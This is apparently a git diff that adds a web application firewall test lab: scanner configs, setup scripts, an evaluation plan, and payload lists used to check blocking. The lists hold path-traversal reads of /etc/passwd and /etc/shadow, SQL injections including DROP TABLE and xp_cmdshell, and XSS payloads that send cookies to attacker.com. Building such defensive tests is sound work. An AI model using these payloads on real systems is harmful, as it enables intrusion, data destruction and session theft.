diff --git a/benchmarks/lab/scenarios/nuclei/nuclei.yaml b/benchmarks/lab/scenarios/nuclei/nuclei.yaml
new file mode 100644
index 0000000..a3943a7
--- /dev/null
+++ b/benchmarks/lab/scenarios/nuclei/nuclei.yaml
@@ -0,0 +1,32 @@
+# Nuclei configuration for guard-proxy WAF evaluation.
+#
+# Template selection: broad coverage of common CVEs and exposures that
+# the CRS ruleset is designed to detect, without noisy/dangerous templates.
+#
+# Reference: https://nuclei.projectdiscovery.io/templating-guide/
+
+# Template tags to include (comma-separated).
+# Focus on attack categories the WAF is expected to block.
+tags: sqli,xss,lfi,rfi,ssrf,injection,traversal,exposure
+
+# Template severity levels to run.
+severity: low,medium,high,critical
+
+# Exclude safe-unverified templates that generate noise without payloads.
+exclude-tags: dos,fuzz,helpers
+
+# Rate limiting — be gentle on the WAF under test to avoid saturating it
+# before the dedicated load test runs.
+rate-limit: 50
+bulk-size: 10
+concurrency: 5
+
+# Timeout per template request.
+timeout: 10
+
+# Retry on network errors.
+retries: 1
+
+# Skip the host after this many request errors (max-host-error counts failed
+# requests, not template matches), so an unreachable target cannot stall the run.
+max-host-error: 30
diff --git a/benchmarks/lab/scenarios/nuclei/targets.txt b/benchmarks/lab/scenarios/nuclei/targets.txt
new file mode 100644
index 0000000..ddf0259
--- /dev/null
+++ b/benchmarks/lab/scenarios/nuclei/targets.txt
@@ -0,0 +1,8 @@
+# Nuclei target list for eval lab.
+# Format: one URL per line (scheme://host[:port] — no path).
+# Hostnames are resolved via Docker's internal DNS when the container
+# runs on the gp_internal network.
+#
+# Targets hit HAProxy on port 80 with the vhost Host: header.
+# Nuclei resolves "haproxy" as the Docker service name when run on gp_internal.
+http://haproxy:80
diff --git a/benchmarks/lab/scenarios/zap/alert-filter.yaml b/benchmarks/lab/scenarios/zap/alert-filter.yaml
new file mode 100644
index 0000000..c0da837
--- /dev/null
+++ b/benchmarks/lab/scenarios/zap/alert-filter.yaml
@@ -0,0 +1,27 @@
+# ZAP alert filter — suppress known false positives for the eval lab.
+#
+# These alerts are expected for the lab setup (self-signed certs, dev configs)
+# and should not count toward the FPR measurement.
+#
+# Reference: https://www.zaproxy.org/docs/desktop/addons/alert-filters/
+
+alertfilters:
+  # Content Security Policy (CSP) header not set — cosmetic for lab targets
+  - ruleId: 10038
+    newRisk: False Positive
+
+  # X-Content-Type-Options not set — cosmetic for lab targets
+  - ruleId: 10021
+    newRisk: False Positive
+
+  # Cache-Control headers — not relevant to WAF testing
+  - ruleId: 10015
+    newRisk: False Positive
+
+  # Server header leakage — lab only, not a WAF effectiveness signal
+  - ruleId: 10036
+    newRisk: False Positive
+
+  # Information disclosure: suspicious comments — lab only
+  - ruleId: 10027
+    newRisk: False Positive
diff --git a/benchmarks/lab/scenarios/zap/zap-baseline.conf b/benchmarks/lab/scenarios/zap/zap-baseline.conf
new file mode 100644
index 0000000..5827a37
--- /dev/null
+++ b/benchmarks/lab/scenarios/zap/zap-baseline.conf
@@ -0,0 +1,22 @@
+# ZAP baseline scan options.
+# Used by run-zap.sh via zap-baseline.py -c zap-baseline.conf
+#
+# Format: <alert-id> TAB <action> TAB (<alert name>) — one rule per line.
+# Actions: IGNORE, INFO, WARN (default), FAIL
+#
+# Suppress purely cosmetic/config alerts so the scan report focuses on
+# WAF-relevant security findings. Keep FAIL for high-severity issues that
+# should always be reported regardless of WAF state.
+
+# Response-header hygiene — suppressed (not WAF signals)
+10021	IGNORE	(X-Content-Type-Options Header Missing)
+10015	IGNORE	(Re-examine Cache-control Directives)
+10036	IGNORE	(HTTP Server Response Header)
+
+# CSP not set — suppress for lab targets
+10038	IGNORE	(Content Security Policy (CSP) Header Not Set)
+
+# Cookie Secure flag and password autocomplete — not meaningful for the
+# plain-HTTP lab
+10011	IGNORE	(Cookie Without Secure Flag)
+10012	IGNORE	(Password Autocomplete in Browser)
diff --git a/benchmarks/lab/setup-lab.sh b/benchmarks/lab/setup-lab.sh
new file mode 100755
index 0000000..2b2c7d4
--- /dev/null
+++ b/benchmarks/lab/setup-lab.sh
@@ -0,0 +1,234 @@
+#!/usr/bin/env bash
+# setup-lab.sh — Bring up the evaluation lab and register all target vhosts.
+#
+# Extends the demo stack with WordPress/Juice Shop/DVWA targets, seeds two
+# WAF policies (baseline PL1 and high-paranoia PL2), and wires each target
+# domain through HAProxy via the guard-proxy backend API.
+#
+# Prerequisites:
+#   - deploy/demo/.env   (copy from deploy/demo/.env.example)
+#   - benchmarks/lab/.env (copy from benchmarks/lab/.env.example)
+#   - CRS submodule initialised: git submodule update --init --recursive
+#   - Docker with Docker Compose v2
+#
+# Usage: ./benchmarks/lab/setup-lab.sh [--skip-compose]
+
+set -Eeuo pipefail
+
+SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd -- "${SCRIPT_DIR}/../.." && pwd)"
+DEMO_COMPOSE="${REPO_ROOT}/deploy/demo/docker-compose.yml"
+TARGETS_COMPOSE="${SCRIPT_DIR}/docker-compose.targets.yml"
+DEMO_ENV="${REPO_ROOT}/deploy/demo/.env"
+LAB_ENV="${SCRIPT_DIR}/.env"
+TIMEOUT_SECONDS="${TIMEOUT_SECONDS:-240}"
+SKIP_COMPOSE=false
+
+for arg in "$@"; do
+  case "$arg" in
+    --skip-compose) SKIP_COMPOSE=true ;;
+  esac
+done
+
+for f in "${DEMO_ENV}" "${LAB_ENV}"; do
+  if [[ ! -f "${f}" ]]; then
+    echo "Missing ${f}. Copy the matching .env.example first." >&2
+    exit 1
+  fi
+done
+
+# Prefer the Compose v2 plugin; fall back to the standalone docker-compose binary.
+if docker compose version >/dev/null 2>&1; then COMPOSE=(docker compose)
+elif command -v docker-compose >/dev/null 2>&1; then COMPOSE=(docker-compose)
+else
+  echo "Docker Compose is required." >&2
+  exit 1
+fi
+COMPOSE+=(-f "${DEMO_COMPOSE}" -f "${TARGETS_COMPOSE}" --env-file "${DEMO_ENV}" --env-file "${LAB_ENV}")
+
+# ── Helpers (mirrored from deploy/demo/setup-demo.sh) ──────────────────────
+
+# env_value NAME [FALLBACK] — print NAME's value from the .env files, or FALLBACK when unset/empty.
+env_value() {
+  local name="$1" fallback="${2:-}" value
+  # Last match wins: the lab file is listed last so it overrides the demo file, like Compose's --env-file order.
+  value="$(grep -hE "^${name}=" "${DEMO_ENV}" "${LAB_ENV}" 2>/dev/null | tail -n 1 | cut -d= -f2- || true)"
+  printf '%s' "${value:-${fallback}}"
+}
+
+json_string() {  # Print $1 encoded as a JSON string literal (surrounding quotes included).
+  python3 -c 'from json import dumps; from sys import argv; print(dumps(argv[1]))' "$1"
+}
+
+api_json() {
+  local method="$1"; local path="$2"; local token="${3:-}"; local body="${4:-}"
+  local response_file http_code
+  response_file="$(mktemp)"
+  if [[ -n "${body}" ]]; then
+    http_code="$(curl --silent --show-error --output "${response_file}" --write-out '%{http_code}' \
+      --request "${method}" --header "Content-Type: application/json" \
+      ${token:+--header "Authorization: Bearer ${token}"} --data "${body}" "${API_BASE_URL}${path}")"
+  else
+    http_code="$(curl --silent --show-error --output "${response_file}" --write-out '%{http_code}' \
+      --request "${method}" ${token:+--header "Authorization: Bearer ${token}"} "${API_BASE_URL}${path}")"
+  fi
+  if [[ "${http_code}" -lt 200 || "${http_code}" -ge 300 ]]; then
+    echo "API ${method} ${path} failed with HTTP ${http_code}:" >&2
+    cat "${response_file}" >&2; rm -f "${response_file}"; return 1
+  fi
+  cat "${response_file}"; rm -f "${response_file}"
+}
+
+health_status() {
+  local service="$1"; local id
+  id="$("${COMPOSE[@]}" ps -q "${service}" 2>/dev/null || true)"
+  if [[ -z "${id}" ]]; then echo "missing"; return; fi
+  docker inspect --format '{{if .State.Health}}{{.State.Health.Status}}{{else}}{{.State.Status}}{{end}}' "${id}"
+}
+
+# wait_for_healthy SERVICE — poll every 3 s until the service reports "healthy".
+# Fails on "exited"/"dead" or after TIMEOUT_SECONDS; any other status keeps polling.
+wait_for_healthy() {
+  local service="$1" status deadline=$((SECONDS + TIMEOUT_SECONDS))
+  echo "Waiting for ${service}..."
+  until (( SECONDS >= deadline )); do
+    status="$(health_status "${service}")"
+    [[ "${status}" != "healthy" ]] || { echo "${service} is healthy."; return 0; }
+    [[ "${status}" != "exited" && "${status}" != "dead" ]] || { echo "${service} is ${status}." >&2; return 1; }
+    sleep 3
+  done
+  echo "Timed out waiting for ${service}; last status: ${status:-unknown}." >&2; return 1
+}
+
+ensure_crs_bundle() {
+  if compgen -G "${REPO_ROOT}/configs/coraza/crs/rules/*.conf" >/dev/null; then return; fi
+  echo "Missing OWASP CRS rules in configs/coraza/crs." >&2
+  echo "Run: git submodule update --init --recursive" >&2; exit 1
+}
+
+ensure_policy() {  # Create policy NAME from BODY (or look it up) and print ONLY its id on stdout.
+  local name="$1" body="$2" response
+  # Callers capture stdout with $(...), so progress output must go to stderr.
+  echo "Ensuring WAF policy '${name}' exists..." >&2
+  response="$(api_json POST /policies "${token}" "${body}" || true)"
+  if [[ -z "${response}" ]]; then
+    response="$(api_json GET /policies "${token}")"
+  fi
+  POLICY_NAME="${name}" POLICY_RESPONSE="${response}" python3 - <<'PY'
+import json, sys, os
+data = json.loads(os.environ["POLICY_RESPONSE"])
+name = os.environ["POLICY_NAME"]
+items = data if isinstance(data, list) else [data]
+for item in items:
+    if item["name"] == name:
+        print(item["id"]); sys.exit(0)
+sys.exit(f"Policy '{name}' not found after create/list")
+PY
+}
+
+ensure_vhost() {
+  local domain="$1"; local backend_url="$2"; local description="$3"; local policy_id="$4"
+  echo "Ensuring vhost ${domain} -> ${backend_url}..."
+  local vhost_body vhost_response vhost_id
+  vhost_body="$(printf '{"domain":%s,"backend_url":%s,"description":%s,"ssl_enabled":false,"is_active":true,"policy_id":%s}' \
+    "$(json_string "${domain}")" "$(json_string "${backend_url}")" \
+    "$(json_string "${description}")" "${policy_id}")"
+  vhost_response="$(api_json POST /vhosts "${token}" "${vhost_body}" || true)"
+  if [[ -n "${vhost_response}" ]]; then return; fi
+  local vhosts_response
+  vhosts_response="$(api_json GET /vhosts "${token}")"
+  vhost_id="$(VHOSTS="${vhosts_response}" DOMAIN="${domain}" python3 - <<'PY'
+import json, os
+data = json.loads(os.environ["VHOSTS"]); domain = os.environ["DOMAIN"]
+for item in data:
+    if item["domain"] == domain:
+        print(item["id"]); exit(0)
+exit(f"vhost {domain!r} not found")
+PY
+  )"
+  api_json PATCH "/vhosts/${vhost_id}" "${token}" "${vhost_body}" >/dev/null
+}
+
+# ── Main ───────────────────────────────────────────────────────────────────
+
+# Abort early when the OWASP CRS rule files are missing from the checkout.
+ensure_crs_bundle
+
+if [[ "${SKIP_COMPOSE}" == false ]]; then
+  echo "Starting demo + lab target stack..."
+  "${COMPOSE[@]}" up -d --build
+
+  # Wait on each service in turn before the control-plane API is used below.
+  for lab_service in backend coraza haproxy demo-app demo-api juiceshop dvwa wordpress; do
+    wait_for_healthy "${lab_service}"
+  done
+fi
+
+# Credentials and endpoints; env_value is presumably (key, fallback) — confirm against its definition.
+ADMIN_EMAIL="$(env_value ADMIN_EMAIL admin@example.com)"
+ADMIN_PASSWORD="$(env_value ADMIN_PASSWORD GuardProxyDemo12345)"
+BACKEND_HTTP_PORT="$(env_value BACKEND_HTTP_PORT 8000)"
+API_BASE_URL="http://127.0.0.1:${BACKEND_HTTP_PORT}"
+HAPROXY_HTTP_PORT="$(env_value HAPROXY_HTTP_PORT 8080)"
+WAF_BASE_URL="http://127.0.0.1:${HAPROXY_HTTP_PORT}"
+
+# Log in once; ${token} is handed to every api_json call that follows.
+echo "Logging in..."
+login_body="$(printf '{"email":%s,"password":%s}' "$(json_string "${ADMIN_EMAIL}")" "$(json_string "${ADMIN_PASSWORD}")")"
+token="$(api_json POST /auth/login "" "${login_body}" \
+  | python3 -c 'import json,sys; print(json.load(sys.stdin)["access_token"])')"
+
+# ── Policies ───────────────────────────────────────────────────────────────
+
+LAB_POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+LAB_POLICY_PARANOIA="$(env_value LAB_POLICY_PARANOIA 1)"
+LAB_POLICY_INBOUND_THRESHOLD="$(env_value LAB_POLICY_INBOUND_THRESHOLD 5)"
+
+baseline_body="$(printf '{"name":%s,"description":"Lab evaluation baseline — PL%s anomaly threshold %s block","paranoia_level":%s,"inbound_anomaly_threshold":%s,"enforcement_mode":"block"}' \
+  "$(json_string "${LAB_POLICY_NAME}")" "${LAB_POLICY_PARANOIA}" "${LAB_POLICY_INBOUND_THRESHOLD}" \
+  "${LAB_POLICY_PARANOIA}" "${LAB_POLICY_INBOUND_THRESHOLD}")"
+baseline_policy_id="$(ensure_policy "${LAB_POLICY_NAME}" "${baseline_body}")"
+
+LAB_PL2_POLICY_NAME="$(env_value LAB_PL2_POLICY_NAME 'Lab PL2')"
+LAB_PL2_POLICY_PARANOIA="$(env_value LAB_PL2_POLICY_PARANOIA 2)"
+LAB_PL2_POLICY_INBOUND_THRESHOLD="$(env_value LAB_PL2_POLICY_INBOUND_THRESHOLD 3)"
+
+pl2_body="$(printf '{"name":%s,"description":"Lab evaluation high-paranoia — PL%s anomaly threshold %s block","paranoia_level":%s,"inbound_anomaly_threshold":%s,"enforcement_mode":"block"}' \
+  "$(json_string "${LAB_PL2_POLICY_NAME}")" "${LAB_PL2_POLICY_PARANOIA}" "${LAB_PL2_POLICY_INBOUND_THRESHOLD}" \
+  "${LAB_PL2_POLICY_PARANOIA}" "${LAB_PL2_POLICY_INBOUND_THRESHOLD}")"
+pl2_policy_id="$(ensure_policy "${LAB_PL2_POLICY_NAME}" "${pl2_body}")"
+
+# ── Vhosts ─────────────────────────────────────────────────────────────────
+
+# Per target: resolve domain and backend URL, then create/update its vhost on the baseline policy.
+LAB_JUICESHOP_DOMAIN="$(env_value LAB_JUICESHOP_DOMAIN juice.local)"
+LAB_JUICESHOP_BACKEND_URL="$(env_value LAB_JUICESHOP_BACKEND_URL http://juiceshop:3000)"
+ensure_vhost "${LAB_JUICESHOP_DOMAIN}" "${LAB_JUICESHOP_BACKEND_URL}" "OWASP Juice Shop — intentionally vulnerable app" "${baseline_policy_id}"
+LAB_DVWA_DOMAIN="$(env_value LAB_DVWA_DOMAIN dvwa.local)"
+LAB_DVWA_BACKEND_URL="$(env_value LAB_DVWA_BACKEND_URL http://dvwa:80)"
+ensure_vhost "${LAB_DVWA_DOMAIN}" "${LAB_DVWA_BACKEND_URL}" "DVWA — Damn Vulnerable Web Application" "${baseline_policy_id}"
+LAB_WP_DOMAIN="$(env_value LAB_WP_DOMAIN wp.local)"
+LAB_WP_BACKEND_URL="$(env_value LAB_WP_BACKEND_URL http://wordpress:80)"
+ensure_vhost "${LAB_WP_DOMAIN}" "${LAB_WP_BACKEND_URL}" "WordPress — real CMS for FP measurement (no CRS exclusions)" "${baseline_policy_id}"
+
+echo "Applying generated HAProxy/Coraza config..."
+api_json POST /config/apply "${token}" >/dev/null
+
+# ── DVWA DB initialisation (idempotent) ────────────────────────────────────
+echo "Initialising DVWA database..."
+dvwa_cookies="$(mktemp)"  # private per-run cookie jar; a fixed /tmp path is predictable and goes stale
+curl -sf --max-time 30 -c "${dvwa_cookies}" -b "${dvwa_cookies}" \
+  -d "create_db=Create+%2F+Reset+Database" \
+  -H "Host: ${LAB_DVWA_DOMAIN}" "${WAF_BASE_URL}/setup.php" >/dev/null \
+  || echo "DVWA setup.php returned non-200 (may already be initialised)"
+rm -f "${dvwa_cookies}"
+
+# Closing hints: one curl per lab vhost through the WAF, followed by a SQLi
+# probe that is expected to come back as 403.
+printf '%s\n' '' "Eval lab is ready." \
+  "  Juice Shop:  curl -H 'Host: ${LAB_JUICESHOP_DOMAIN}' ${WAF_BASE_URL}/" \
+  "  DVWA:        curl -H 'Host: ${LAB_DVWA_DOMAIN}' ${WAF_BASE_URL}/" \
+  "  WordPress:   curl -H 'Host: ${LAB_WP_DOMAIN}' ${WAF_BASE_URL}/" \
+  '' "Quick smoke:" \
+  "  curl -si -H 'Host: ${LAB_JUICESHOP_DOMAIN}' '${WAF_BASE_URL}/?q=1+UNION+SELECT+1--' | grep 'HTTP/'" \
+  "  (expect 403 — WAF blocking SQLi)"
diff --git a/benchmarks/lab/teardown-lab.sh b/benchmarks/lab/teardown-lab.sh
new file mode 100755
index 0000000..955b37a
--- /dev/null
+++ b/benchmarks/lab/teardown-lab.sh
@@ -0,0 +1,36 @@
+#!/usr/bin/env bash
+# teardown-lab.sh — Stop and optionally remove the evaluation lab stack.
+#
+# Usage:
+#   ./benchmarks/lab/teardown-lab.sh          # stop containers, keep volumes
+#   ./benchmarks/lab/teardown-lab.sh --clean  # stop + remove all volumes
+
+set -Eeuo pipefail
+
+SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd -- "${SCRIPT_DIR}/../.." && pwd)"
+DEMO_COMPOSE="${REPO_ROOT}/deploy/demo/docker-compose.yml"
+TARGETS_COMPOSE="${SCRIPT_DIR}/docker-compose.targets.yml"
+DEMO_ENV="${REPO_ROOT}/deploy/demo/.env"
+LAB_ENV="${SCRIPT_DIR}/.env"
+
+CLEAN=false
+for arg in "$@"; do
+  case "$arg" in --clean) CLEAN=true ;; esac
+done
+
+if docker compose version >/dev/null 2>&1; then
+  COMPOSE=(docker compose -f "${DEMO_COMPOSE}" -f "${TARGETS_COMPOSE}")
+  [[ -f "${DEMO_ENV}" ]] && COMPOSE+=(--env-file "${DEMO_ENV}")
+  [[ -f "${LAB_ENV}" ]] && COMPOSE+=(--env-file "${LAB_ENV}")
+else
+  COMPOSE=(docker-compose -f "${DEMO_COMPOSE}" -f "${TARGETS_COMPOSE}")
+fi
+
+if [[ "${CLEAN}" == true ]]; then
+  echo "Stopping lab and removing all volumes..."
+  "${COMPOSE[@]}" down -v
+else
+  echo "Stopping lab (volumes preserved)..."
+  "${COMPOSE[@]}" down
+fi
diff --git a/benchmarks/payloads/legitimate.txt b/benchmarks/payloads/legitimate.txt
new file mode 100644
index 0000000..c27fe73
--- /dev/null
+++ b/benchmarks/payloads/legitimate.txt
@@ -0,0 +1,28 @@
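+# Legitimate request paths — none should be blocked by the WAF (no 403); the backend's own status may vary per target (e.g. a redirect, or 404 where the path does not exist).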
+# Used to verify the false positive rate.
+/
+/index.html
+/robots.txt
+/favicon.ico
+/about
+/contact
+/login
+/search?q=hello+world
+/search?q=buy+laptop
+/search?q=how+to+cook+pasta
+/api/v1/status
+/api/v1/products
+/api/v1/products?page=1&per_page=20
+/api/v1/products?sort=price&order=asc
+/api/v1/users/me
+/wp-login.php
+/wp-admin/
+/wp-content/themes/twentytwentyfour/style.css
+/wp-json/wp/v2/posts
+/?p=1
+/?page_id=2
+/category/news/
+/tag/technology/
+/?s=wordpress+tutorial
+/feed/
+/sitemap.xml
diff --git a/benchmarks/payloads/lfi.txt b/benchmarks/payloads/lfi.txt
new file mode 100644
index 0000000..a23441e
--- /dev/null
+++ b/benchmarks/payloads/lfi.txt
@@ -0,0 +1,19 @@
+# Local File Inclusion / Path Traversal payloads — should be blocked at PL1.
+../etc/passwd
+../../etc/passwd
+../../../etc/passwd
+../../../../etc/passwd
+../../../../../etc/passwd
+../../../../../../etc/passwd
+..\..\..\windows\system32\cmd.exe
+../etc/shadow
+/etc/passwd
+/etc/shadow
+/proc/self/environ
+/proc/self/fd/0
+../etc/hosts
+%2e%2e%2fetc%2fpasswd
+%2e%2e/%2e%2e/etc/passwd
+..%2fetc%2fpasswd
+%252e%252e%252fetc%252fpasswd
+....//....//....//etc/passwd
diff --git a/benchmarks/payloads/sqli.txt b/benchmarks/payloads/sqli.txt
new file mode 100644
index 0000000..7aefd43
--- /dev/null
+++ b/benchmarks/payloads/sqli.txt
@@ -0,0 +1,22 @@
+# SQL injection payloads — used in manual verification and smoke tests.
+# These should all produce a 403 response from the WAF (PL1, threshold 5, block).
+# Source: OWASP Testing Guide, CRS test corpus.
+' OR '1'='1
+' OR '1'='1' --
+' OR 1=1--
+1' ORDER BY 1--
+1' ORDER BY 2--
+1' ORDER BY 3--
+1 UNION SELECT null--
+1 UNION SELECT null,null--
+1 UNION ALL SELECT NULL,NULL,NULL--
+'; DROP TABLE users;--
+1; SELECT * FROM users--
+' AND 1=2 UNION SELECT username,password FROM users--
+admin'--
+' OR 'x'='x
+1' AND SLEEP(5)--
+1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
+'; EXEC xp_cmdshell('whoami')--
+1; WAITFOR DELAY '0:0:5'--
+' HAVING 1=1--
diff --git a/benchmarks/payloads/xss.txt b/benchmarks/payloads/xss.txt
new file mode 100644
index 0000000..018fb7c
--- /dev/null
+++ b/benchmarks/payloads/xss.txt
@@ -0,0 +1,14 @@
+# XSS payloads — should all be blocked by the WAF at PL1.
+<script>alert(1)</script>
+<script>alert('XSS')</script>
+"><script>alert(document.cookie)</script>
+<img src=x onerror=alert(1)>
+<svg onload=alert(1)>
+javascript:alert(1)
+<body onload=alert(1)>
+<iframe src="javascript:alert(1)">
+<a href="javascript:void(0)" onclick="alert(1)">click</a>
+'"><img src=x onerror=this.src='http://attacker.com/?c='+document.cookie>
+<script>fetch('http://attacker.com/?c='+btoa(document.cookie))</script>
+<input type="text" value="" onfocus="alert(1)" autofocus>
+<details open ontoggle=alert(1)>
diff --git a/benchmarks/results/.gitkeep b/benchmarks/results/.gitkeep
new file mode 100644
index 0000000..e69de29
diff --git a/docs/evaluation-plan.md b/docs/evaluation-plan.md
new file mode 100644
index 0000000..0328eb0
--- /dev/null
+++ b/docs/evaluation-plan.md
@@ -0,0 +1,337 @@
+# Evaluation Plan — Guard Proxy WAF
+
+**Document status:** methodology contract — written before experiments run.  
+**Related chapter:** `thesis/chapters/06-testy.md` (results will be recorded there).  
+**Lab source:** `benchmarks/lab/` — all configs, composes, and runner scripts.
+
+---
+
+## 1. Scope
+
+This evaluation assesses guard-proxy as a Web Application Firewall: HAProxy (reverse proxy) with Coraza+OWASP CRS (WAF engine) and a FastAPI control plane that generates HAProxy/Coraza configuration from a policy database.
+
+**In scope:**
+
+- Security effectiveness: detection of SQLi, XSS, LFI/path traversal, and common CVE payloads.
+- False positive rate against legitimate CMS traffic (WordPress).
+- Performance overhead: latency (p50/p95/p99) and throughput (RPS) compared to direct access.
+- Resource consumption (CPU, RAM) of the WAF stack under load.
+
+**Out of scope:**
+
+- Authenticated multi-step attack chains.
+- DoS / rate-limiting capabilities.
+- Per-vhost Coraza plugin configuration (planned for a future milestone).
+
+---
+
+## 2. Hardware and Software Environment
+
+### Test server
+
+| Property | Value |
+|---|---|
+| Host | Dell PowerEdge R530 (Proxmox PVE 9.1.1) |
+| CPU | 2 × Intel Xeon E5-2620 v3 @ 2.40 GHz (12 cores / 24 threads total) |
+| RAM | 125 GiB (32 GiB free at lab time) |
+| Storage | ZFS `fast-pool` (~810 GiB free) |
+| OS (LXC guest) | Debian 13 (Trixie) — `debian-13-standard` template |
+| Docker | Docker Engine ≥ 27.x, Compose V2 |
+
+**LXC provisioning** (see §8 for full runbook):
+
+```
+pct create <VMID> local:vztmpl/debian-13-standard_13.1-2_amd64.tar.zst \
+  --hostname guard-proxy-lab \
+  --memory 16384 --swap 4096 \
+  --cores 6 \
+  --storage fast-pool \
+  --rootfs fast-pool:60 \
+  --net0 name=eth0,bridge=vmbr0,ip=dhcp \
+  --features nesting=1,keyctl=1 \
+  --unprivileged 1
+```
+
+CPU pinning for reproducibility (add to `/etc/pve/lxc/<VMID>.conf`):
+
+```
+lxc.cgroup2.cpuset.cpus: 18-23
+```
+
+This pins the lab container to logical CPUs 18–23 (hardware threads rather than full physical cores — confirm their socket/core placement with `lscpu -e`), away from the homelab media services running on logical CPUs 0–17.
+
+### Noisy-neighbour declaration
+
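+The Proxmox host runs ~20 LXC containers (media stack: Jellyfin, \*arr apps, Immich, etc.) with live background traffic. This represents a **shared-tenancy deployment scenario** typical of self-hosted WAF use cases. Each run captures host load average at start time in `results/run-<RUN_ID>/manifest.json`. Runs are repeated three times and the median is reported, which already damps a single disturbed run. Outliers (>2 standard deviations) are discarded; note that with only three samples no value can lie more than ≈1.15 sample standard deviations from the mean, so this rule only becomes effective when additional repetitions are made.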
+
+### Software versions (recorded per run)
+
+All image tags are pinned in `benchmarks/lab/docker-compose.targets.yml` and runner scripts. The git SHA and image digests of each run are written to `manifest.json` automatically.
+
+---
+
+## 3. Test-Bed Architecture
+
+```
+┌─ Proxmox LXC (guard-proxy-lab) ────────────────────────────────────────┐
+│                                                                          │
+│  ┌─ Attacker containers ──┐   ┌─ guard-proxy stack (gp_internal) ────┐  │
+│  │  go-ftw                │   │                                       │  │
+│  │  OWASP ZAP             ├──►│  HAProxy :80  ──►  Coraza SPOA :9000 │  │
+│  │  Nuclei                │   │                        │              │  │
+│  │  wrk (load)            │   │               ┌────────┘              │  │
+│  └────────────────────────┘   │               ▼                       │  │
+│                               │  Target apps (gp_internal):           │  │
+│  Host header routes request   │    juice.local → Juice Shop :3000     │  │
+│  to the correct vhost:        │    dvwa.local  → DVWA :80             │  │
+│    Host: juice.local          │    wp.local    → WordPress :80        │  │
+│    Host: dvwa.local           │    app.local   → demo-app :8080       │  │
+│    Host: wp.local             └───────────────────────────────────────┘  │
+└──────────────────────────────────────────────────────────────────────────┘
+```
+
+All attacker containers and target apps run inside `gp_internal` (Docker bridge). Attackers reach HAProxy at `http://haproxy:80` with the appropriate `Host:` header. HAProxy forwards to the target after SPOE inspection; Coraza fires the CRS ruleset.
+
+Lab source: `benchmarks/lab/`  
+Compose overlay: `benchmarks/lab/docker-compose.targets.yml`
+
+---
+
+## 4. Test Targets
+
+| App | Purpose | Vhost |
+|---|---|---|
+| **OWASP Juice Shop** v17 | Intentionally vulnerable Node.js app — primary TPR target | `juice.local` |
+| **DVWA** (Damn Vulnerable Web App) | Classic PHP vulnerable app — SQLi/XSS/LFI scenarios | `dvwa.local` |
+| **WordPress** 6.x (php8.3) | Real-world CMS — primary **FPR target** (no CRS exclusions) | `wp.local` |
+| **demo-app** (echo server) | Existing minimal target — smoke check | `app.local` |
+
+WordPress is run **without** CRS application exclusion plugins. This is intentional: the false positive rate against an untuned CRS+WP configuration is itself a finding, and per-vhost exclusion support is not yet implemented in the backend. The comparison will be revisited once per-vhost Coraza configuration lands.
+
+---
+
+## 5. Test Scenarios
+
+### 5.1 CRS Regression Suite (go-ftw) — TPR gold standard
+
+**Tool:** `ghcr.io/coreruleset/go-ftw`  
+**Config:** `benchmarks/lab/scenarios/crs-ftw/config.yaml`  
+**Corpus:** `configs/coraza/crs/tests/regression/tests/` (OWASP CRS git submodule)
+
+The CRS submodule ships labeled test cases — each test case specifies whether the WAF **should** block or **should** pass the request. go-ftw replays all cases and reports pass/fail per rule. This is the most authoritative TPR measurement because the corpus was written by the same team that wrote the rules.
+
+Targets: Juice Shop (`juice.local`) as the default routing vhost.
+
+### 5.2 OWASP ZAP Baseline Scan — FPR measurement
+
+**Tool:** `ghcr.io/zaproxy/zaproxy` (`zap-baseline.py`)  
+**Config:** `benchmarks/lab/scenarios/zap/`
+
+`zap-baseline.py` spiders the target application through HAProxy and passively analyses the responses; it does not send attack payloads (active scanning is what `zap-full-scan.py` does). The crawl is therefore legitimate-looking traffic, and any request the WAF blocks during it counts as a false positive. ZAP alerts with Medium/High risk are recorded as context; the WAF's response (block or pass) to the crawl provides the FPR signal on real application traffic.
+
+Primary target: **WordPress** (`wp.local`) — the richest source of false positive measurements because a real CMS has complex, diverse traffic patterns.
+
+### 5.3 Nuclei CVE Templates — CVE TPR
+
+**Tool:** `projectdiscovery/nuclei`  
+**Config:** `benchmarks/lab/scenarios/nuclei/nuclei.yaml`  
+**Template tags:** `sqli,xss,lfi,rfi,ssrf,injection,traversal,exposure` (severity: medium+)
+
+Nuclei fires known CVE and exposure payloads from its curated template library. Each finding that reaches the target app is a potential WAF false negative; cross-referenced against the Coraza audit log in `collect-metrics.sh`.
+
+Target: Juice Shop and DVWA (both known to match many templates).
+
+### 5.4 Benign Load Test — Latency and RPS overhead
+
+**Tool:** `williamyeh/wrk` with `benchmarks/lab/scenarios/load/benign-mix.lua`
+
+Two runs per target:
+
+1. **Through HAProxy+Coraza** — production WAF path
+2. **Direct to target container** — bypasses HAProxy (port mapped inside `gp_internal`)
+
+Latency overhead = WAF_value − direct_value (per percentile); RPS degradation is defined in §6.  
+Config: 4 threads, 50 connections, 60-second duration.
+
+---
+
+## 6. Metrics and Definitions
+
+### Security metrics
+
+| Metric | Symbol | Formula |
+|---|---|---|
+| True Positive Rate (Recall) | TPR | TP / (TP + FN) |
+| False Positive Rate | FPR | FP / (FP + TN) |
+| True Positive | TP | Attack request correctly blocked |
+| False Negative | FN | Attack request incorrectly allowed |
+| True Negative | TN | Benign request correctly allowed |
+| False Positive | FP | Benign request incorrectly blocked |
+
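+For go-ftw: TP/FN/TN/FP are derived from the pass/fail outcomes of the labeled test cases; with go-ftw v1.x the attack/benign split is estimated rather than read per case (see §9.4).  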
+For ZAP/Nuclei: WAF blocks are identified from the Coraza audit log (JSON lines with `response.status == 403`); unblocked attack requests are FN candidates.
+
+### Performance metrics
+
+| Metric | Definition |
+|---|---|
+| p50/p95/p99 latency | 50th/95th/99th percentile of request round-trip time (ms), measured by wrk `--latency` |
+| Latency overhead | Latency(WAF) − Latency(direct) per percentile |
+| RPS | Requests per second at sustained load |
+| RPS degradation % | (RPS_direct − RPS_WAF) / RPS_direct × 100 |
+| Memory peak (MB) | Peak container memory (`docker stats` / cgroup `memory.peak`) during load |
+| CPU avg % | Average CPU utilisation during load run |
+
+### Results schema
+
